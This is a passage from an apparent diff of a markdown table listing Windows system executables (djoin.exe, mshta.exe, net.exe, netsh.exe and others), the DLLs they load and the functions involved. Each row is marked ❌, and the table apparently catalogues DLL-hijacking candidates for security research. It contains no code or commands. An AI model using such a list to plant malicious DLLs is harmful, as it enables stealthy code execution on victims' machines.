djoin.exe | wdscore.dll | ConstructPartialMsgVW | +| ❌ | djoin.exe | wdscore.dll | CurrentIP | +| ❌ | djoin.exe | wdscore.dll | DllMain | +| ❌ | djoin.exe | wdscore.dll | WdsSetupLogDestroy | +| ❌ | djoin.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | djoin.exe | wdscore.dll | WdsSetupLogMessageW | +| ❌ | djoin.exe | wkscli.dll | DllMain | +| ❌ | dmcertinst.exe | certenroll.dll | DllMain | +| ❌ | dmcertinst.exe | DMCmnUtils.dll | DllMain | +| ❌ | dmcertinst.exe | DSPARSE.dll | DllMain | +| ❌ | dmcertinst.exe | iri.dll | DllMain | +| ❌ | dmcertinst.exe | omadmapi.dll | DllMain | +| ❌ | dmcertinst.exe | omadmapi.dll | ProcessCommandLine | +| ❌ | dmcfghost.exe | DMCmnUtils.dll | DllMain | +| ❌ | dmcfghost.exe | DMPushProxy.dll | DllMain | +| ❌ | dmcfghost.exe | DMPushProxy.dll | PushRouter\_FreeGetMessageEventName | +| ❌ | dmcfghost.exe | DMPushProxy.dll | PushRouter\_Open | +| ❌ | dmcfghost.exe | dmxmlhelputils.dll | DllMain | +| ❌ | dmcfghost.exe | dsclient.dll | DllMain | +| ❌ | dmcfghost.exe | iri.dll | DllMain | +| ❌ | dmcfghost.exe | omadmapi.dll | DllMain | +| ❌ | dmcfghost.exe | XmlLite.dll | DllMain | +| ❌ | dmclient.exe | WINHTTP.dll | DllMain | +| ❌ | dmclient.exe | XmlLite.dll | DllMain | +| ❌ | dmnotificationbroker.exe | DMCmnUtils.dll | DllMain | +| ❌ | dmomacpmo.exe | DEVOBJ.dll | DllMain | +| ❌ | dmomacpmo.exe | DMCmnUtils.dll | DllMain | +| ❌ | dmomacpmo.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | dmomacpmo.exe | DMProcessXMLFiltered.dll | DllMain | +| ❌ | dmomacpmo.exe | dsclient.dll | DllMain | +| ❌ | dmomacpmo.exe | iri.dll | DllMain | +| ❌ | dmomacpmo.exe | omadmapi.dll | DllMain | +| ❌ | dmomacpmo.exe | omadmapi.dll | ProcessCommandLine | +| ❌ | dmomacpmo.exe | USERENV.dll | DllMain | +| ❌ | dmomacpmo.exe | XmlLite.dll | DllMain | +| ❌ | dnscacheugc.exe | dbgcore.DLL | DllMain | +| ❌ | dnscacheugc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | dnscacheugc.exe | wdscore.dll | ConstructPartialMsgVW | +| ❌ | dnscacheugc.exe | wdscore.dll | CurrentIP | +| ❌ | 
dnscacheugc.exe | wdscore.dll | DllMain | +| ❌ | dnscacheugc.exe | wdscore.dll | WdsSetupLogDestroy | +| ❌ | dnscacheugc.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | dnscacheugc.exe | wdscore.dll | WdsSetupLogMessageW | +| ❌ | dpapimig.exe | netutils.dll | DllMain | +| ❌ | dpapimig.exe | netutils.dll | NetApiBufferFree | +| ❌ | dpapimig.exe | samcli.dll | DllMain | +| ❌ | dpapimig.exe | samcli.dll | NetUserModalsGet | +| ❌ | dpapimig.exe | SAMLIB.dll | DllMain | +| ❌ | dpapimig.exe | SAMLIB.dll | SamConnect | +| ❌ | dpapimig.exe | SAMLIB.dll | SamEnumerateDomainsInSamServer | +| ❌ | dpapimig.exe | SAMLIB.dll | SamFreeMemory | +| ❌ | dpiscaling.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | dpiscaling.exe | CLDAPI.dll | DllMain | +| ❌ | dpiscaling.exe | CRYPTBASE.DLL | DllMain | +| ❌ | dpiscaling.exe | edputil.dll | DllMain | +| ❌ | dpiscaling.exe | edputil.dll | EdpGetIsManaged | +| ❌ | dpiscaling.exe | FLTLIB.DLL | DllMain | +| ❌ | dpiscaling.exe | PROPSYS.dll | DllMain | +| ❌ | dpiscaling.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | dpiscaling.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | driverquery.exe | netutils.dll | DllMain | +| ❌ | driverquery.exe | srvcli.dll | DllMain | +| ❌ | driverquery.exe | SspiCli.dll | DllMain | +| ❌ | drvinst.exe | DEVOBJ.dll | DllMain | +| ❌ | drvinst.exe | DEVRTL.dll | DllMain | +| ❌ | dsregcmd.exe | dsreg.dll | DllMain | +| ❌ | dsregcmd.exe | logoncli.dll | DllMain | +| ❌ | dsregcmd.exe | netutils.dll | DllMain | +| ❌ | dsregcmd.exe | PROPSYS.dll | DllMain | +| ❌ | dsregcmd.exe | SSPICLI.DLL | DllMain | +| ❌ | dsregcmd.exe | USERENV.dll | DllMain | +| ❌ | dsregcmd.exe | WINHTTP.dll | DllMain | +| ❌ | dsregcmd.exe | WININET.dll | DllMain | +| ❌ | dsregcmd.exe | wkscli.dll | DllMain | +| ❌ | dstokenclean.exe | dsclient.dll | DllMain | +| ❌ | dstokenclean.exe | dsclient.dll | DSRemoveExpiredTokens | +| ❌ | dwm.exe | CoreMessaging.dll | DllMain | +| ❌ | dwm.exe | d2d1.dll | DllMain | +| ❌ | 
dwm.exe | d3d11.dll | DllMain | +| ❌ | dwm.exe | D3DCOMPILER\_47.dll | DllMain | +| ❌ | dwm.exe | dwmcore.dll | DllMain | +| ❌ | dwm.exe | dxgi.dll | DllMain | +| ❌ | dwm.exe | dxgi.dll | DXGIDeclareAdapterRemovalSupport | +| ❌ | dwwin.exe | wer.dll | DllMain | +| ❌ | dxgiadaptercache.exe | d3d11.dll | DllMain | +| ❌ | dxgiadaptercache.exe | d3d12.dll | DllMain | +| ❌ | dxgiadaptercache.exe | dxgi.dll | DllMain | +| ❌ | dxpserver.exe | dwmapi.dll | DllMain | +| ❌ | dxpserver.exe | msi.dll | DllMain | +| ❌ | dxpserver.exe | PROPSYS.dll | DllMain | +| ❌ | dxpserver.exe | XmlLite.dll | DllMain | +| ❌ | easeofaccessdialog.exe | OLEACC.dll | DllMain | +| ❌ | edpcleanup.exe | DMCmnUtils.dll | DllMain | +| ❌ | edpcleanup.exe | DNSAPI.dll | DllMain | +| ❌ | edpcleanup.exe | FirewallAPI.dll | DllMain | +| ❌ | edpcleanup.exe | fwbase.dll | DllMain | +| ❌ | edpcleanup.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | edpcleanup.exe | fwbase.dll | FwCriticalSectionDestroy | +| ❌ | edpcleanup.exe | netutils.dll | DllMain | +| ❌ | edpcleanup.exe | policymanager.dll | DllMain | +| ❌ | edpcleanup.exe | SspiCli.dll | DllMain | +| ❌ | edpcleanup.exe | wkscli.dll | DllMain | +| ❌ | eduprintprov.exe | deviceassociation.dll | DllMain | +| ❌ | eduprintprov.exe | policymanager.dll | DllMain | +| ❌ | eduprintprov.exe | policymanager.dll | PolicyManager\_GetPolicy | +| ❌ | eduprintprov.exe | SspiCli.dll | DllMain | +| ❌ | eduprintprov.exe | SspiCli.dll | GetUserNameExW | +| ❌ | efsui.exe | credui.dll | DllMain | +| ❌ | efsui.exe | CRYPTBASE.DLL | DllMain | +| ❌ | efsui.exe | CRYPTUI.dll | DllMain | +| ❌ | efsui.exe | DSROLE.dll | DllMain | +| ❌ | efsui.exe | EFSADU.dll | DllMain | +| ❌ | efsui.exe | EFSUTIL.dll | DllMain | +| ❌ | efsui.exe | FeClient.dll | DllMain | +| ❌ | efsui.exe | logoncli.dll | DllMain | +| ❌ | efsui.exe | netutils.dll | DllMain | +| ❌ | efsui.exe | USERENV.dll | DllMain | +| ❌ | efsui.exe | VAULTCLI.dll | DllMain | +| ❌ | ehstorauthn.exe | UxTheme.dll | DllMain | 
+| ❌ | esentutl.exe | ESENT.dll | DllMain | +| ❌ | eventcreate.exe | netutils.dll | DllMain | +| ❌ | eventcreate.exe | srvcli.dll | DllMain | +| ❌ | eventcreate.exe | SspiCli.dll | DllMain | +| ❌ | expand.exe | Cabinet.dll | DllMain | +| ❌ | extrac32.exe | Cabinet.dll | DllMain | +| ❌ | fhmanagew.exe | fhsvcctl.dll | DllMain | +| ❌ | filehistory.exe | CRYPTBASE.dll | DllMain | +| ❌ | filehistory.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | filehistory.exe | UxTheme.dll | DllMain | +| ❌ | filehistory.exe | UxTheme.dll | EnableThemeDialogTexture | +| ❌ | filehistory.exe | UxTheme.dll | OpenThemeData | +| ❌ | fixmapi.exe | mapistub.dll | DllMain | +| ❌ | fixmapi.exe | mapistub.dll | FixMAPI | +| ❌ | fltmc.exe | FLTLIB.DLL | DllMain | +| ❌ | fltmc.exe | FLTLIB.DLL | FilterFindFirst | +| ❌ | fltmc.exe | FLTLIB.DLL | FilterFindNext | +| ❌ | fondue.exe | msi.dll | DllMain | +| ❌ | fondue.exe | osbaseln.dll | DllMain | +| ❌ | fondue.exe | PROPSYS.dll | DllMain | +| ❌ | fsiso.exe | iumbase.DLL | DllMain | +| ❌ | fsquirt.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | fsquirt.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | +| ❌ | fsquirt.exe | DEVOBJ.dll | DevObjGetClassDevs | +| ❌ | fsquirt.exe | DEVOBJ.dll | DllMain | +| ❌ | fsquirt.exe | dwmapi.dll | DllMain | +| ❌ | fsquirt.exe | dwmapi.dll | DwmExtendFrameIntoClientArea | +| ❌ | fsquirt.exe | OLEACC.dll | DllMain | +| ❌ | fsquirt.exe | OLEACC.dll | GetRoleTextW | +| ❌ | ftp.exe | SspiCli.dll | DllMain | +| ❌ | fvenotify.exe | FVEAPI.dll | DllMain | +| ❌ | fvenotify.exe | FVEAPI.dll | FveFindFirstVolume | +| ❌ | fvenotify.exe | FVEAPI.dll | FveFindNextVolume | +| ❌ | fvenotify.exe | FVEAPI.dll | FveGetStatus | +| ❌ | fvenotify.exe | FVEAPI.dll | FveGetVolumeNameW | +| ❌ | fvenotify.exe | FVEAPI.dll | FveIsVolumeEncryptable | +| ❌ | fvenotify.exe | FVEAPI.dll | FveOpenVolumeByHandle | +| ❌ | fvenotify.exe | FVEAPI.dll | FveOpenVolumeW | +| ❌ | fveprompt.exe | FVEAPI.dll | DllMain | +| ❌ | fxscover.exe | 
IPHLPAPI.DLL | DllMain | +| ❌ | fxscover.exe | IPHLPAPI.DLL | GetAdaptersAddresses | +| ❌ | fxssvc.exe | credui.dll | DllMain | +| ❌ | fxssvc.exe | FXSTIFF.dll | DllMain | +| ❌ | fxssvc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | fxssvc.exe | PROPSYS.dll | DllMain | +| ❌ | fxssvc.exe | TAPI32.dll | DllMain | +| ❌ | gamepanel.exe | d2d1.dll | DllMain | +| ❌ | gamepanel.exe | d3d11.dll | DllMain | +| ❌ | gamepanel.exe | dcomp.dll | DllMain | +| ❌ | gamepanel.exe | dwmapi.dll | DllMain | +| ❌ | gamepanel.exe | dwmapi.dll | DwmSetWindowAttribute | +| ❌ | gamepanel.exe | DWrite.dll | DllMain | +| ❌ | gamepanel.exe | DWrite.dll | DWriteCreateFactory | +| ❌ | gamepanel.exe | dxgi.dll | CreateDXGIFactory2 | +| ❌ | gamepanel.exe | dxgi.dll | DllMain | +| ❌ | gamepanel.exe | msdrm.dll | DllMain | +| ❌ | gamepanel.exe | UIAutomationCore.DLL | DllMain | +| ❌ | gamepanel.exe | UxTheme.dll | DllMain | +| ❌ | gamepanel.exe | UxTheme.dll | EnableThemeDialogTexture | +| ❌ | gamepanel.exe | UxTheme.dll | OpenThemeData | +| ❌ | genvalobj.exe | bcd.dll | DllMain | +| ❌ | getmac.exe | netutils.dll | DllMain | +| ❌ | getmac.exe | srvcli.dll | DllMain | +| ❌ | getmac.exe | SspiCli.dll | DllMain | +| ❌ | getmac.exe | wkscli.dll | DllMain | +| ❌ | gpresult.exe | logoncli.dll | DllMain | +| ❌ | gpresult.exe | netutils.dll | DllMain | +| ❌ | gpresult.exe | NTDSAPI.dll | DllMain | +| ❌ | gpresult.exe | Secur32.dll | DllMain | +| ❌ | gpresult.exe | srvcli.dll | DllMain | +| ❌ | gpresult.exe | SspiCli.dll | DllMain | +| ❌ | gpupdate.exe | USERENV.dll | DllMain | +| ❌ | gpupdate.exe | wevtapi.dll | DllMain | +| ❌ | hvax64.exe | KDSTUB.dll | DllMain | +| ❌ | hvix64.exe | KDSTUB.dll | DllMain | +| ❌ | hvsievaluator.exe | DismApi.DLL | DllMain | +| ❌ | hvsievaluator.exe | DMCmnUtils.dll | DllMain | +| ❌ | hvsievaluator.exe | iri.dll | DllMain | +| ❌ | hvsievaluator.exe | omadmapi.dll | DllMain | +| ❌ | hvsievaluator.exe | policymanager.dll | DllMain | +| ❌ | hvsievaluator.exe | policymanager.dll | 
PolicyManager\_GetPolicyInt | +| ❌ | ie4uinit.exe | CRYPTBASE.DLL | DllMain | +| ❌ | ie4uinit.exe | IEADVPACK.dll | DllMain | +| ❌ | ie4uinit.exe | iedkcs32.dll | DllMain | +| ❌ | ie4uinit.exe | MLANG.dll | DllMain | +| ❌ | ie4uinit.exe | netutils.dll | DllMain | +| ❌ | ie4uinit.exe | WININET.dll | DllMain | +| ❌ | ie4uinit.exe | wkscli.dll | DllMain | +| ❌ | ieunatt.exe | dbgcore.DLL | DllMain | +| ❌ | klist.exe | secur32.dll | DllMain | +| ❌ | ksetup.exe | logoncli.dll | DllMain | +| ❌ | ksetup.exe | netutils.dll | DllMain | +| ❌ | ksetup.exe | srvcli.dll | DllMain | +| ❌ | ksetup.exe | SspiCli.dll | DllMain | +| ❌ | label.exe | DEVOBJ.dll | DllMain | +| ❌ | licensingdiag.exe | Cabinet.dll | DllMain | +| ❌ | licensingdiag.exe | Cabinet.dll | FCICreate | +| ❌ | licensingdiag.exe | CLIPC.dll | ClipGatherDiagnostics | +| ❌ | licensingdiag.exe | CLIPC.dll | ClipGenerateDeviceLicenseRequest | +| ❌ | licensingdiag.exe | CLIPC.dll | ClipGetLicenseAndPolicyForPfn | +| ❌ | licensingdiag.exe | CLIPC.dll | ClipOpen | +| ❌ | licensingdiag.exe | CLIPC.dll | DllMain | +| ❌ | lockscreencontentserver.exe | dwmapi.dll | DllMain | +| ❌ | lpksetup.exe | CRYPTBASE.dll | DllMain | +| ❌ | lpksetup.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | lpksetup.exe | dpx.dll | DllMain | +| ❌ | lpremove.exe | AppXAllUserStore.dll | DllMain | +| ❌ | lpremove.exe | AppXAllUserStore.dll | IsNonInboxAllUserPackage | +| ❌ | lpremove.exe | AppXDeploymentClient.dll | DllMain | +| ❌ | lpremove.exe | Bcp47Langs.dll | Bcp47GetMuiForm | +| ❌ | lpremove.exe | Bcp47Langs.dll | DllMain | +| ❌ | lpremove.exe | Bcp47Langs.dll | GetUserLanguagesForUser | +| ❌ | lpremove.exe | DNSAPI.dll | DllMain | +| ❌ | lpremove.exe | FirewallAPI.dll | DllMain | +| ❌ | lpremove.exe | fwbase.dll | DllMain | +| ❌ | lpremove.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | lpremove.exe | fwbase.dll | FwCriticalSectionDestroy | +| ❌ | lpremove.exe | StateRepository.Core.dll | DllMain | +| ❌ | magnify.exe | d3d9.dll | DllMain 
| +| ❌ | magnify.exe | MAGNIFICATION.dll | DllMain | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagInitialize | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagSetFullscreenTransform | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagSetFullscreenUseBitmapSmoothing | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagSetInputTransform | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagShowSystemCursor | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagUninitialize | +| ❌ | magnify.exe | OLEACC.dll | DllMain | +| ❌ | magnify.exe | UIAutomationCore.DLL | DllMain | +| ❌ | magnify.exe | WTSAPI32.dll | DllMain | +| ❌ | makecab.exe | Cabinet.dll | DllMain | +| ❌ | mcbuilder.exe | bcp47mrm.dll | DllMain | +| ❌ | mcbuilder.exe | bcp47mrm.dll | IsWellFormedTag | +| ❌ | mcbuilder.exe | mrmcoreR.dll | DllMain | +| ❌ | mcbuilder.exe | mrmcoreR.dll | MergeSystemPriFiles | +| ❌ | mdeserver.exe | d3d11.dll | DllMain | +| ❌ | mdeserver.exe | dxgi.dll | DllMain | +| ❌ | mdeserver.exe | MFPlat.DLL | DllMain | +| ❌ | mdeserver.exe | MFPlat.DLL | MFStartup | +| ❌ | mdeserver.exe | RTWorkQ.DLL | DllMain | +| ❌ | mdeserver.exe | RTWorkQ.DLL | RtwqRegisterPlatformEvents | +| ❌ | mdeserver.exe | RTWorkQ.DLL | RtwqStartup | +| ❌ | mdeserver.exe | SspiCli.dll | DllMain | +| ❌ | mdeserver.exe | winmde.dll | DllMain | +| ❌ | mdmappinstaller.exe | DEVOBJ.dll | DllMain | +| ❌ | mdmappinstaller.exe | DMCmnUtils.dll | DllMain | +| ❌ | mdmappinstaller.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | mdmappinstaller.exe | iri.dll | DllMain | +| ❌ | mdmappinstaller.exe | msi.dll | DllMain | +| ❌ | mdmappinstaller.exe | omadmapi.dll | DllMain | +| ❌ | mdmappinstaller.exe | USERENV.dll | DllMain | +| ❌ | mdmappinstaller.exe | WTSAPI32.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | DEVOBJ.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | DMCmnUtils.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | mdmdiagnosticstool.exe | dmiso8601utils.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | DynamoAPI.dll | 
DllMain | +| ❌ | mdmdiagnosticstool.exe | iri.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | MdmDiagnostics.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | omadmapi.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | policymanager.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | tbs.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | USERENV.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | WINHTTP.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | WININET.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | XmlLite.dll | DllMain | +| ❌ | mfpmp.exe | CRYPTBASE.DLL | DllMain | +| ❌ | mfpmp.exe | ksuser.dll | DllMain | +| ❌ | mfpmp.exe | MFCORE.dll | DllMain | +| ❌ | mfpmp.exe | MFPlat.DLL | DllMain | +| ❌ | mfpmp.exe | MFPlat.DLL | MFGetCallStackTracingWeakReference | +| ❌ | mfpmp.exe | MFPlat.DLL | MFShutdown | +| ❌ | mfpmp.exe | RTWorkQ.DLL | DllMain | +| ❌ | mfpmp.exe | RTWorkQ.DLL | RtwqRegisterPlatformEvents | +| ❌ | mfpmp.exe | RTWorkQ.DLL | RtwqShutdown | +| ❌ | microsoft.uev.cscunpintool.exe | CSCAPI.dll | DllMain | +| ❌ | microsoft.uev.cscunpintool.exe | CSCAPI.dll | OfflineFilesQueryStatus | +| ❌ | microsoftedgebchost.exe | iertutil.dll | DllMain | +| ❌ | microsoftedgebchost.exe | USERENV.dll | DllMain | +| ❌ | microsoftedgecp.exe | iertutil.dll | DllMain | +| ❌ | microsoftedgecp.exe | USERENV.dll | DllMain | +| ❌ | microsoftedgedevtools.exe | iertutil.dll | DllMain | +| ❌ | microsoftedgesh.exe | USERENV.dll | DllMain | +| ❌ | microsoftedgesh.exe | USERENV.dll | GetAppContainerRegistryLocation | +| ❌ | mobsync.exe | edputil.dll | DllMain | +| ❌ | mobsync.exe | edputil.dll | EdpGetIsManaged | +| ❌ | mobsync.exe | PROPSYS.dll | DllMain | +| ❌ | mobsync.exe | PROPSYS.dll | PSGetNameFromPropertyKey | +| ❌ | mobsync.exe | PROPSYS.dll | PSStringFromPropertyKey | +| ❌ | mobsync.exe | PROPSYS.dll | VariantToString | +| ❌ | mousocoreworker.exe | winsqlite3.dll | DllMain | +| ❌ | msdt.exe | ATL.DLL | DllMain | +| ❌ | msdt.exe | Cabinet.dll | DllMain | +| ❌ | msdt.exe | SSPICLI.DLL | 
DllMain | +| ❌ | msdt.exe | SSPICLI.DLL | GetUserNameExW | +| ❌ | msdt.exe | UxTheme.dll | DllMain | +| ❌ | msdt.exe | wer.dll | DllMain | +| ❌ | msdt.exe | WINHTTP.dll | DllMain | +| ❌ | msdtc.exe | CLUSAPI.dll | DllMain | +| ❌ | msdtc.exe | DNSAPI.dll | DllMain | +| ❌ | msdtc.exe | ktmw32.dll | DllMain | +| ❌ | msdtc.exe | MSDTCTM.dll | DllMain | +| ❌ | msdtc.exe | MSDTCTM.dll | DtcMainExt | +| ❌ | msdtc.exe | MTXCLU.DLL | DllMain | +| ❌ | msdtc.exe | RESUTILS.dll | DllMain | +| ❌ | msdtc.exe | XOLEHLP.dll | DllMain | +| ❌ | msg.exe | WINSTA.dll | DllMain | +| ❌ | mshta.exe | CRYPTBASE.DLL | DllMain | +| ❌ | mshta.exe | netutils.dll | DllMain | +| ❌ | mshta.exe | srpapi.dll | DllMain | +| ❌ | mshta.exe | srpapi.dll | SrpGetEnterpriseIds | +| ❌ | mshta.exe | SspiCli.dll | DllMain | +| ❌ | mshta.exe | SspiCli.dll | GetUserNameExW | +| ❌ | mshta.exe | WINHTTP.dll | DllMain | +| ❌ | mshta.exe | wkscli.dll | DllMain | +| ❌ | mshta.exe | WLDP.DLL | DllMain | +| ❌ | mshta.exe | WLDP.DLL | WldpGetLockdownPolicy | +| ❌ | msiexec.exe | msi.dll | DllMain | +| ❌ | msiexec.exe | msi.dll | MsiLoadStringW | +| ❌ | msiexec.exe | msi.dll | MsiMessageBoxExW | +| ❌ | msinfo32.exe | ATL.DLL | DllMain | +| ❌ | msinfo32.exe | SLC.dll | DllMain | +| ❌ | msinfo32.exe | sppc.dll | DllMain | +| ❌ | mspaint.exe | MSFTEDIT.DLL | DllMain | +| ❌ | mspaint.exe | PROPSYS.dll | DllMain | +| ❌ | msra.exe | IPHLPAPI.DLL | DllMain | +| ❌ | msra.exe | IPHLPAPI.DLL | GetAdaptersAddresses | +| ❌ | msra.exe | IPHLPAPI.DLL | NotifyUnicastIpAddressChange | +| ❌ | msra.exe | NDFAPI.DLL | DllMain | +| ❌ | msra.exe | SspiCli.dll | DllMain | +| ❌ | msra.exe | SspiCli.dll | GetUserNameExA | +| ❌ | msra.exe | SspiCli.dll | GetUserNameExW | +| ❌ | msra.exe | USERENV.dll | DllMain | +| ❌ | msra.exe | USERENV.dll | GetProfileType | +| ❌ | msra.exe | UxTheme.dll | DllMain | +| ❌ | msra.exe | UxTheme.dll | IsAppThemed | +| ❌ | msra.exe | UxTheme.dll | IsThemeActive | +| ❌ | msra.exe | UxTheme.dll | OpenThemeData | 
+| ❌ | msra.exe | wdi.dll | DllMain | +| ❌ | mstsc.exe | credui.dll | DllMain | +| ❌ | mstsc.exe | CRYPTBASE.DLL | DllMain | +| ❌ | mstsc.exe | CRYPTUI.dll | DllMain | +| ❌ | mstsc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | mstsc.exe | ktmw32.dll | DllMain | +| ❌ | mstsc.exe | NETUTILS.DLL | DllMain | +| ❌ | mstsc.exe | SSPICLI.DLL | DllMain | +| ❌ | mstsc.exe | WINHTTP.dll | DllMain | +| ❌ | mstsc.exe | WININET.dll | DllMain | +| ❌ | mstsc.exe | WKSCLI.DLL | DllMain | +| ❌ | mtstocom.exe | SspiCli.dll | DllMain | +| ❌ | muiunattend.exe | dbgcore.DLL | DllMain | +| ❌ | muiunattend.exe | SspiCli.dll | DllMain | +| ❌ | muiunattend.exe | wdscore.dll | ConstructPartialMsgVW | +| ❌ | muiunattend.exe | wdscore.dll | CurrentIP | +| ❌ | muiunattend.exe | wdscore.dll | DllMain | +| ❌ | muiunattend.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | muiunattend.exe | wdscore.dll | WdsSetupLogMessageW | +| ❌ | musnotification.exe | Cabinet.dll | DllMain | +| ❌ | musnotification.exe | UpdatePolicy.dll | DllMain | +| ❌ | musnotification.exe | UPShared.dll | DllMain | +| ❌ | musnotification.exe | USERENV.dll | DllMain | +| ❌ | musnotification.exe | WINHTTP.dll | DllMain | +| ❌ | musnotification.exe | WINSTA.dll | DllMain | +| ❌ | musnotification.exe | WINSTA.dll | WinStationEnumerateW | +| ❌ | musnotificationux.exe | Cabinet.dll | DllMain | +| ❌ | musnotificationux.exe | DMCmnUtils.dll | DllMain | +| ❌ | musnotificationux.exe | UpdatePolicy.dll | DllMain | +| ❌ | musnotificationux.exe | UPShared.dll | DllMain | +| ❌ | musnotificationux.exe | WINHTTP.dll | DllMain | +| ❌ | musnotificationux.exe | XmlLite.dll | DllMain | +| ❌ | musnotifyicon.exe | DMCmnUtils.dll | DllMain | +| ❌ | musnotifyicon.exe | UPShared.dll | DllMain | +| ❌ | musnotifyicon.exe | WINHTTP.dll | DllMain | +| ❌ | musnotifyicon.exe | XmlLite.dll | DllMain | +| ❌ | nbtstat.exe | IPHLPAPI.DLL | DllMain | +| ❌ | net.exe | IPHLPAPI.DLL | DllMain | +| ❌ | net.exe | netutils.dll | DllMain | +| ❌ | net.exe | netutils.dll | 
NetApiBufferAllocate | +| ❌ | net.exe | samcli.dll | DllMain | +| ❌ | net.exe | srvcli.dll | DllMain | +| ❌ | net.exe | wkscli.dll | DllMain | +| ❌ | net1.exe | CRYPTBASE.dll | DllMain | +| ❌ | net1.exe | DSROLE.dll | DllMain | +| ❌ | net1.exe | logoncli.dll | DllMain | +| ❌ | net1.exe | netutils.dll | DllMain | +| ❌ | net1.exe | netutils.dll | NetApiBufferAllocate | +| ❌ | net1.exe | samcli.dll | DllMain | +| ❌ | net1.exe | srvcli.dll | DllMain | +| ❌ | net1.exe | wkscli.dll | DllMain | +| ❌ | netbtugc.exe | dbgcore.DLL | DllMain | +| ❌ | netbtugc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | netbtugc.exe | wdscore.dll | ConstructPartialMsgVA | +| ❌ | netbtugc.exe | wdscore.dll | CurrentIP | +| ❌ | netbtugc.exe | wdscore.dll | DllMain | +| ❌ | netbtugc.exe | wdscore.dll | WdsSetupLogDestroy | +| ❌ | netbtugc.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | netbtugc.exe | wdscore.dll | WdsSetupLogMessageA | +| ❌ | nethost.exe | RASAPI32.dll | DllMain | +| ❌ | nethost.exe | RASAPI32.dll | RasConfigUserProxySettingsW | +| ❌ | nethost.exe | rasman.dll | DllMain | +| ❌ | nethost.exe | rtutils.dll | DllMain | +| ❌ | nethost.exe | rtutils.dll | TraceRegisterExA | +| ❌ | netiougc.exe | dbgcore.DLL | DllMain | +| ❌ | netiougc.exe | dhcpcsvc.DLL | DllMain | +| ❌ | netiougc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | netiougc.exe | wdscore.dll | ConstructPartialMsgVA | +| ❌ | netiougc.exe | wdscore.dll | CurrentIP | +| ❌ | netiougc.exe | wdscore.dll | DllMain | +| ❌ | netiougc.exe | wdscore.dll | WdsSetupLogDestroy | +| ❌ | netiougc.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | netiougc.exe | wdscore.dll | WdsSetupLogMessageA | +| ❌ | netsh.exe | adsldpc.dll | DllMain | +| ❌ | netsh.exe | AUTHFWCFG.DLL | DllMain | +| ❌ | netsh.exe | AUTHFWCFG.DLL | InitHelperDll | +| ❌ | netsh.exe | Cabinet.dll | DllMain | +| ❌ | netsh.exe | CRYPTBASE.DLL | DllMain | +| ❌ | netsh.exe | DHCPCMONITOR.DLL | DllMain | +| ❌ | netsh.exe | DHCPCMONITOR.DLL | InitHelperDll | +| ❌ | netsh.exe | dhcpcsvc.DLL | DllMain | 
+| ❌ | netsh.exe | dhcpcsvc6.DLL | DllMain | +| ❌ | netsh.exe | DNSAPI.dll | DllMain | +| ❌ | netsh.exe | dot3api.dll | DllMain | +| ❌ | netsh.exe | DOT3CFG.DLL | DllMain | +| ❌ | netsh.exe | DOT3CFG.DLL | InitHelperDll | +| ❌ | netsh.exe | eappcfg.dll | DllMain | +| ❌ | netsh.exe | eappprxy.dll | DllMain | +| ❌ | netsh.exe | FirewallAPI.dll | DllMain | +| ❌ | netsh.exe | FirewallAPI.dll | FwAlloc | +| ❌ | netsh.exe | FirewallAPI.dll | FwFree | +| ❌ | netsh.exe | fwbase.dll | DllMain | +| ❌ | netsh.exe | fwbase.dll | FwAlloc | +| ❌ | netsh.exe | fwbase.dll | FwBaseAlloc | +| ❌ | netsh.exe | fwbase.dll | FwBaseFree | +| ❌ | netsh.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | netsh.exe | fwbase.dll | FwReportErrorAsWinError | +| ❌ | netsh.exe | FWCFG.DLL | DllMain | +| ❌ | netsh.exe | FWCFG.DLL | InitHelperDll | +| ❌ | netsh.exe | FWPolicyIOMgr.dll | DllMain | +| ❌ | netsh.exe | fwpuclnt.dll | DllMain | +| ❌ | netsh.exe | HNETMON.DLL | DllMain | +| ❌ | netsh.exe | HNETMON.DLL | InitHelperDll | +| ❌ | netsh.exe | HTTPAPI.dll | DllMain | +| ❌ | netsh.exe | HTTPAPI.dll | HttpInitialize | +| ❌ | netsh.exe | IFMON.DLL | DllMain | +| ❌ | netsh.exe | IFMON.DLL | InitHelperDll | +| ❌ | netsh.exe | IPHLPAPI.DLL | DllMain | +| ❌ | netsh.exe | IPHLPAPI.DLL | GetDefaultCompartmentId | +| ❌ | netsh.exe | ktmw32.dll | 